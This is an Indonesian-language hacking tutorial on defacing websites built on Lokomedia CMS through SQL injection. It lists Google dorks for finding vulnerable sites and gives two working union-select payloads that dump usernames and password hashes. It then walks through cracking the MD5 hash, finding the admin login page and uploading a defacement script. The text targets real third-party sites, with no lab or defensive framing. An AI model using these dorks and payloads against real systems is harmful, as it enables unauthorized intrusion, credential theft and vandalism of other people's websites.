cara deface sqil lokomedia

pendekar hitam

hello bos kembali lagi ma gua pendekar hitam
jgn coly mulu ya bos inget umur wkwkwkw dah lah langsung aja 
pd kesempatan kali ini gua mau bagiin Tutorial SQL Injection on Lokomedia CMS .
langsung aja nyimik ya wkwkw

Dork : - inurl:kategori-23-hiburan.html
           - inurl:hal-tentang-kami.html
           - inurl:statis-1-pengantar.html
           - inurl:statis-19-beasiswa.html
           - inurl:statis-22-kerjasama.html

kembangin lagi tuh dork bos biar bisa dapet yg unch

eXploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
 atau ini juga bisa : 'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+           tinggal pilih aja ya bos yg lo mau


1. tulis dork di google

2. Pilih web target, Lalu masukan eXploitnya.
di target saya menjadi seperti ini: target.asw/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html



Sekarang sudah kelihatan user sama passwordnya di bagian title. 
kemudian ctrl+u untuk melihatnya lebih jelas.

Terlihat User : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 , karena password masih dalam bentuk MD5 maka harus di decrypt, saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password: admin.
Kalean bisa gunakan web atau aplikasi laen utk ngeDecrypt MD5 ini.

Untuk login biasanya di :
- www.target.asw/admin
- www.target.asw/adminweb
- www.target.asw/administrator
- www.target.asw/redaktur
klo yg diatas gx bisa lo bisa pake apk admin panel finder  banyak di google
Kali ini loginnya berada di target.c0li/adminweb/
, Kemudian masukan user dan pass nya trus tinggal upload aja sc lo di situ
done

bila ada kesalahan mohon maaf ya bos maklum gua juga masih noob
semoga bermanfaat ya  thx